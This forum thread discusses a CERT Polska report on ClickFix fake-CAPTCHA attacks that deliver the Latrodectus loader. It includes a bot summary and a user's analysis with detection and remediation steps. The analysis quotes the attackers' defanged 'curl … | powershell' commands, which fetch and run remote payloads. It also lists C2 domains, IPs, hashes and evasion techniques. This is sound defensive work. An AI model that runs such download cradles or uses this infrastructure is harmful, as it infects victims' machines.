ClickFix in action: how fake captcha can lead to a company-wide infection

[Khushal]

Content source

https://cert.pl/en/posts/2026/02/fake-captcha-in-action/

CERT Polska have just published a new blog article on the topic of ClickFix/fake CAPTCHA campaigns. Step-by-step overview of the infection, malware analysis, IoCs and YARA rules to help secure your own infrastructure.

ClickFix in action: how fake captcha can lead to a company-wide infection

We assisted a large organisation in the investigation and remediation of a live malware infection caused by a successful Fake Captcha attack. In this report, we summarize our observations and publish an in-depth malware analysis.

cert.pl

 

[Bot]

Good find — CERT Polska’s write-up (published 17 February 2026) is a solid end-to-end case study of how “fake CAPTCHA / ClickFix” social engineering can turn into full code execution and follow-on malware. It’s especially useful because it ties the initial user action to host artifacts, network activity, and provides detection content (IoCs + a YARA rule).

What the article shows (high-level chain)

• The “fake CAPTCHA” lures the victim into copying a command and running it via Win+R (Run dialog), which effectively hands the attacker interactive code execution.
• Observed initial commands included patterns like: cmd -> curl … | powershell (i.e., piping remote content into PowerShell).
• On an infected host they found indicators consistent with DLL side-loading in %APPDATA%\Intel (legit binaries alongside a malicious DLL).
• They attribute parts of the activity to Latrodectus (loader) and also describe “Supper” payloads (often discussed as pre-ransomware), including persistence via a Scheduled Task.

Practical detection ideas you can apply immediately

• Hunt for “curl … | powershell” (and similar “download cradle” patterns) in EDR telemetry / Windows Security logs (process creation), and in PowerShell operational logs if enabled.
• Check for suspicious Scheduled Task creation (the article shows a GoogleUpdateTask name and a very short execution interval as a persistence clue).
• Host-based IoCs worth hunting (from the case):
  • %APPDATA%\Intel with unusual “Intel-ish” binaries + unexpected DLLs (DLL side-loading pattern)
  • Suspicious DLLs in user profile AppData\Local
• Network-based hunting:
  • Domains used in the described chain include naintn.com, jzluw.com, gasrobariokley.com, fadoklismokley.com (treat as threat intel; expect churn).
  • C2 IPs discussed for the “Supper” component include 162.19.199.110 (4043), 146.19.49.130 (8080), 185.233.166.27 (443), and 85.239.54.130 (noted as inactive in their analysis).

Hardening / prevention takeaways (defender side)

• User awareness: any “CAPTCHA” that instructs “Press Win+R, paste, and run” should be treated as malicious by default. This is the core of ClickFix.
• Reduce “living-off-the-land” abuse:
  • Consider WDAC/AppLocker policies to constrain who can run PowerShell and scripting engines (or limit them to signed/approved scripts where feasible).
  • Enable/centralize PowerShell logging (Script Block Logging, Module Logging) and detailed process command-line logging, then alert on common download-cradle patterns.
• If you have an IR pipeline: the article’s included YARA (for Supper) is directly usable for targeted scanning, but should be validated in your environment to manage false positives and performance impact.

If someone in a business environment suspects they executed one of these “fake CAPTCHA” commands, treat it as a potential incident (not just adware): isolate the endpoint, preserve logs, and do a scoped hunt for the same command-line / domains across the fleet.

Sources

• ClickFix in action: how fake captcha can lead to a company-wide infection

 

[ForgottenSeer 123960]

Technical Analysis & Remediation

Attack Chain & Delivery
The attack begins with a "Fake CAPTCHA" lure (ClickFix). Users are prompted to copy a code snippet to "verify" their humanity.
This snippet is a cmd [/c] command piped to PowerShell, utilizing curl to fetch the next stage payload.

Observed Command
cmd [/c] curl naintn[.]com/amazoncdn[.]com/oeiich37874cj30dkk43885j10vj38h38jd/nrs/opn/ca/ | powershell.

Variant Command
cmd [/c] curl jzluw[.]com/cdn-dynmedia-1.microsoft[.]com/is/n03ufh3k003jdhkg99fhhas/is/content/ | powershell.

Latrodectus Payload Analysis
Once executed, the malware establishes persistence and C2 communication.

Version: The sample identifies itself as version 2.3 in C2 beacon data.

Installation
The malware drops files into %APPDATA%\Intel, using a legitimate Intel executable (igfxSDK[.]exe) to sideload the malicious wtsapi32[.]dll.

Evasion

Process Count Check
Latrodectus typically requires at least 75 running processes on Windows 10/11 to execute, aiming to detect sandbox environments.

Anti-Debug
The binary refuses to run if invoked via rundll.exe or regarding[.]exe. It also performs NTDLL unhooking by manually importing a fresh copy of ntdll[.]dll from disk.

Cryptography
Strings are decrypted using AES-256 in CTR mode with a fixed key and variable IV.

MITRE ATT&CK Mapping

T1204.002 (User Execution)
Malicious File/Command via "Fake CAPTCHA".

T1059.001 (Command and Scripting Interpreter) PowerShell execution via cmd [/c].

T1574.002 (Hijack Execution Flow)
DLL Side-Loading (wtsapi32[.]dll).

T1105 (Ingress Tool Transfer)
Downloading payload via curl.

T1027 (Obfuscated Files or Information)
String encryption (AES-CTR).

Telemetry & IOCs

Malicious Files (Hashes)

be5bcdfc0dbe204001b071e8270bd6856ce6841c43338d8db914e045147b0e77
(wtsapi32[.]dll - Malicious Loader)

6673794376681c48ce4981b42e9293eee010d60ef6b100a3866c0abd571ea648
(ClickFix Sample)

Legitimate Files Abused (Do Not Delete without Verification)

b7f8750851e70ec755343d322d7d81ea0fc1b12d4a1ab6a60e7c8605df4cd6a5
(igfxSDK[.]exe)

Network Indicators (C2s & Distribution)

naintn[.]com
(Distribution)

jzluw[.]com
(Distribution)

gasrobariokley[.]com
(Latrodectus C2)

fadoklismokley[.]com
(Latrodectus C2)

Artifacts

Directory
%APPDATA%\Intel containing igfxSDK[.]exe and wtsapi32[.]dll.

Suspicious DLLs in user profile
245282244[.]dll
760468301[.]dll.

Remediation - THE ENTERPRISE TRACK (NIST CSF 2.0)

DETECT (DE)

Command
Query SIEM/EDR for process creation events where cmd[.]exe or powershell[.]exe contains curl and piping (|).

Command
Hunt for the creation of wtsapi32.dll outside of System32 or SysWOW64, specifically in %APPDATA% subdirectories.

Command
Monitor for network traffic to naintn[.]com, jzluw[.]com, or the specific C2 domains listed above.

RESPOND (RS)

Command
Isolate affected hosts immediately. The presence of Latrodectus indicates a precursor to ransomware (often IcedID/Bumblebee lineage).

Command
Terminate processes associated with igfxSDK[.]exe running from %APPDATA% locations.

Command
Delete the persistence mechanism (likely a Scheduled Task or Registry Run key pointing to the sideloaded executable).

RECOVER (RC)

Command
Reimage compromised endpoints. Latrodectus is a sophisticated loader; full remediation usually requires a wipe to ensure no dormant persistence remains.

Remediation - THE HOME USER TRACK (Safety Focus)

Priority 1: Immediate Action

Command
If you pasted code into the "Run" box recently, assume compromise. Disconnect from the internet.

Command
Check the folder %APPDATA%\Intel (Type %APPDATA% in the file explorer bar). If you see igfxSDK[.]exe and wtsapi32[.]dll there, delete the entire folder.

Priority 2: Persistence Removal

Command
Open Task Manager (Ctrl+Shift+Esc). Look for igfxSDK[.]exe or high CPU usage from unfamiliar processes. Right-click and "End Task."

Command
Check "Startup Apps" in Settings. Disable entries that look suspicious or point to the %APPDATA% folders.

Hardening & References

Framework
This campaign relies on user execution. Technical controls (EDR) are critical, but User Awareness Training regarding "Paste to Run" attacks is the primary defense.

PowerShell
Enforce Constrained Language Mode for standard users to limit the efficacy of pasted PowerShell snippets.

Baseline
Restrict curl[.]exe usage for standard users if not required for business operations.

Data derived from CERT Polska and VMRay analysis reports.

Sources

CERT Polska (Incident Report)

VMRay (Malware Analysis)